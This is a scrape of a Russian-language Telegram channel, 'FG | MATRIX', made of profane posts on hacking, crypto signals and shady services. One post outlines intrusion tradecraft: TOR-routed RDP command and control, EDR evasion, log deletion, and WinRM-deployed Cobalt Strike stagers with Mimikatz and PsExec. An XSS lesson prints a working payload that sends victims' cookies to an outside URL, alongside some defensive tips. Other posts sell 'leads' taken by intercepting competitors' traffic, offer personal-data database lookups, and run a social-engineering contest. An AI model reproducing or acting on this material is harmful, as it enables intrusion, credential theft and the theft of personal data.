Управление и контроль TOR
Избегание узлов, контролируемых EDR .
Выжидание подходящего времени и откладывание подозрительных действий для более поздних этапов атаки
Индивидуальный код и хосты соединения для каждой атаки
Техники обфускации, такие как шифрование и загрузка динамической библиотеки
Контркриминалистические методы, такие как удаление файлов журналов
Рассмотрим как пример знакомые механизмы управления и контроля с помощью клиента RDP, работающего через порт 443, маршрутизируемого через TOR. После установки браузера Tor меняется его конфигурация, чтобы он функционировал как постоянная служба, перенаправляя трафик, отправляемый на локальный (динамический) порт с помощью TOR по HTTPS через порт 443. Такие соединения бывают постоянными, поэтому "злоумышленники" могут устанавливать сессии RDP на взломанных хостах и через них, облегчать перемещение внутри сети.
Стейджеры (по типу file.exe) сетапятся удаленно на определенных целевых устройствах с использованием WinRM, каждое из которых настроено по-разному, для соединения с выделенным сервером C2 для загрузки Cobalt Strike Beacon.
Инструментарий для работы в среде обычно подразумевает сканирование сети, запуск команд, создание дампов процессов и сбор данных. Типо Mimikatz или Psexec.
Продолжение следует...
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥4🤝1🫡1
Forwarded from FG | WORKER
/ 📀 Приглашаем всех желающих к сотрудничеству.
Нужен человек, с хорошим опытом разработки смарт-контрактов и взаимодействия с сетями ETH. Аналогичный опыт работы будет плюсом. Чем больше стэк-сетей тем больше возможностей и доход.
Че там по зп:
5% от объема или 500$+ в день, по выполнению ТЗ.
💬 Обратная связь:
@FG_feedback_bot
Нужен человек, с хорошим опытом разработки смарт-контрактов и взаимодействия с сетями ETH. Аналогичный опыт работы будет плюсом. Чем больше стэк-сетей тем больше возможностей и доход.
Че там по зп:
5% от объема или 500$+ в день, по выполнению ТЗ.
@FG_feedback_bot
Please open Telegram to view this post
VIEW IN TELEGRAM
🫡6🤝1
(сигналы которые поступают из наших источников, отобраны аккуратно) - Размер сделки зависит от объема вашего депозита и составляет около 5-7%.
(Преимущественно сигналы поступают от ботов) - сделка составляет примерно 0.5-1% от вашего депозита.
(не требует объяснения, все в названии) - N/A
(При условии использования 3 стратегий)
____________________________
Улучшения, объяснения, результаты и прочая информация будет постепенно поступать в публичные каналы, благодарю от всей души вселенную FG за предоставленную возможность опубликовать свой оффер, иду рубить дрова.
⚙️GUIDE ECOSYSTEM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝5🫡1
Вижу есть люди, которые еще не подписаны на FG TRADE, а зря, вот вам информация, а там уже сами решайте что делать 😎
https://news.1rj.ru/str/FG_TRADE/451
https://news.1rj.ru/str/FG_TRADE/451
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
FG | TRADE
🥶Как идут дела у нас? Вот ответ, но это промежуточный результат, как отчет о работе за день, статистику итоговую мы вскоре тоже опубликуем 🔝
Ждем еще реакций 🔥🔥🔥 для вас все таки стараемся тоже, нужно понимать идти на встречу ко всем без исключения или брать…
Ждем еще реакций 🔥🔥🔥 для вас все таки стараемся тоже, нужно понимать идти на встречу ко всем без исключения или брать…
🫡8❤🔥1🤝1
Ну че вы? Как дела? Седня будем разбираться с ахуительной ошибкой которая есть у всех новичков и самоучек. Веб разработчики готовимся
Не буду ебать вам мозг высерами из википедии объясню на простом примере:
У нас есть Димон - фронтендер и дядя Миша - заказчик
Дядя Миша говорит Димону:
-Бля, захуяч ка мне панельку с отзывами, хочу знач чтоб клиенты могли писать что у меня лучший автосервис
-Ok, boss
Ну и естстественно димон делает всё наотъебись и идёт спать. И тут появляется Дартаньян, ахуенный хакер, решивший спиздеть бд дяди Миши. Заходит знач он на сайт и видит строку с отзывами. В следующую секунду там появляется вот такой вот текст:
<noscript> new Image().src='https://requestinspector.com/inspect/01h0g8ygn7b83t868ka4bncmq8/'+document.cookie; </noscript>
Когда дядя Миша решает проверить что там наворотил Димон, его кукисы отлетают Дартаньяну. Потом с помощью них он залетает в админку, закрепляется на хосте и ворует бд. А что с Димоном? Вместо денег он получает по ебалу.Итак, думаю все уже поняли в чём заключается XSS, но еще раз поясню. Это когда у пользователя есть возможность ебануть что-то на JS и это исполнится как код на странице.
В моём примере создалось изображение, местоположение которого отсылало на удалённый сервер вместе с кукисами. Я привел лишь базовый пример уязвимости, а так хакер ограничен лишь своим скилом и фантазией.
Окей, а как избежать подобной хуйни?
👉Добавляем CSP header. Например:
Content-Security-Policy: noscript-src 'self'
Более подробно читай тут: https://auth0.com/blog/defending-against-xss-with-csp/👉Добавляем WAF, его вариаций дохуя, так что загуглите сами. Да и через CSP защититься намного проще, если вы новичёк в вебе забейте хуй на этот пункт. Не упомянуть о вафе я просто не мог))
👉Тестируем абсолютно все поля пользовательского ввода. Можно например туда вставлять этот код:
<noscript>alert('XSS');</noscript>
Есть отстук? Знач нашли уязвимость. Пиздуем фиксить👉Используем только безопасные функции JS, никаких innerHTML. (ЛГ 💜 СФ )
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10🤝1
Мануал на достаточно трудном языке - нужно или перечитывать или гуглить, но все, что нужно тут есть. Много теории, настройки, скриптов. Много сказано про методы, софты и серваки, под конец неплохая инф про анонимность, заработок и обход защиты. Я даже пару раз хорошо поржал.
⚙️GUIDE ECOSYSTEM \
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍3🫡2
🤙Всем здорова, дайте хорошие каналы в бота. Софт дарк тематики. Задание дает +20 social credit для первого взноса на кошкажену.
Если каналы действительно годные получите доп плюшки.
💬Сюда писать: @FG_feedback_bot
Если каналы действительно годные получите доп плюшки.
💬Сюда писать: @FG_feedback_bot
🤝4🫡1
FG | MATRIX
🤙Всем здорова, дайте хорошие каналы в бота. Софт дарк тематики. Задание дает +20 social credit для первого взноса на кошкажену. Если каналы действительно годные получите доп плюшки. 💬Сюда писать: @FG_feedback_bot
Схемные каналы тоже подойдут. Так же мнение ваше по каналам опишите, насколько они норм. Неправильных ответов нет. Никто спортиков за плохой ответ отправлять не собирается 🤣 🤝 🪵
🫡5👍1
Forwarded from FG | TRADE
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥5🤝1
FG | MATRIX
https://news.1rj.ru/str/FG_TRADE/461
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝5🫡1
Опишите его навыки и историю личности боту.
За самый креативный ответ мы предоставим возможность узнать новое из мира социальной инженерии. В пабликах вы такой информации никогда не найдёте. Игра началась
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝10🫡3
FG | MATRIX
😁Своими словами опишите, информацию из гугла не будем засчитывать.
🔥11👍2🫡2
@FG_feedback_bot
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥9🫡3
FG | MATRIX
Вне зависимости от количества строк, база фулл не продаётся, не хватит денег, надеюсь вы поняли какие личности вам будут доступны. Вы пишите то что вам нужно, мы ищем в базах подходящих людей и связываем вас.
🫡8
👁🗨Хотите научиться получать базы своих конкурентов и закрывать сделки эффективнее чем их отдел продаж?
Речь сейчас идет об фикс услуге, достать можно номера и прочее, через кукисы, обязательно с пользовательским соглашением об обработке данных. Лиды максимально горячие, в момент обращения прилетает заявка сразу. Технология относительно новая, не все о ней знают и не все системы от этого защищены. Абсолютно новая площадка для работы. По стоимости ориентируйтесь закупы делать от 500$. Лид выходит по цене до 100р в крипте. В юридической сфере около 40р. Опять же таки зависит от выбранных конкурентов. Если интересно по тестировать новую технологию лидогенерации, пишите сюда @FG_feedback_bot
Речь сейчас идет об фикс услуге, достать можно номера и прочее, через кукисы, обязательно с пользовательским соглашением об обработке данных. Лиды максимально горячие, в момент обращения прилетает заявка сразу. Технология относительно новая, не все о ней знают и не все системы от этого защищены. Абсолютно новая площадка для работы. По стоимости ориентируйтесь закупы делать от 500$. Лид выходит по цене до 100р в крипте. В юридической сфере около 40р. Опять же таки зависит от выбранных конкурентов. Если интересно по тестировать новую технологию лидогенерации, пишите сюда @FG_feedback_bot
🫡7❤2🤝1
▛▀▀▀▀▀
Что это?
⮑Это поиск горячих лидов, которые необходимы каждому бизнесу и есть существующие компании, у которых их много.
Миссия
⮑Помните Робин Гуда? Так вот вспомните ещё раз.
▙▄▄▄▄
⮑Перехват входящего и исходящего траффика от конкурентов.
⮑Рассылка по базам конкурентов, после их рекламных кампаний.
⮑B2B генерация, парсинг организаций и раскрытие их доходов.
⮑Комплексное сопровождение и оптимизация рабочих процессов, повышение KPI.
1. 5 ваших конкурентов и их полный анализ.
2. Номера телефонов, прочие данные.
3. Оценка ваших возможностей для обработки.
4. Наличие CRM систем, Открытого API для разработки и интеграций.
5. NDA и договора, формированию стоимости за лида.
6. Сопровождение, поддержка на всех этапах, полезные инсайты.
7. Улучшение результатов, систем и качества обработки.
Please open Telegram to view this post
VIEW IN TELEGRAM
🫡5❤🔥1
FG | MATRIX
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝4🫡1
FG | MATRIX
Пов: Где то плачет один сотрудник из службы безопасности банка)
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝4🫡1
Forwarded from FG | TRADE
Среди спикеров также будут: СЕО Binance, Артур Хейс, CEO Tether и много других немало известных людей, такие люди просто так вместе не собираются это точно .
Please open Telegram to view this post
VIEW IN TELEGRAM
🫡4👎1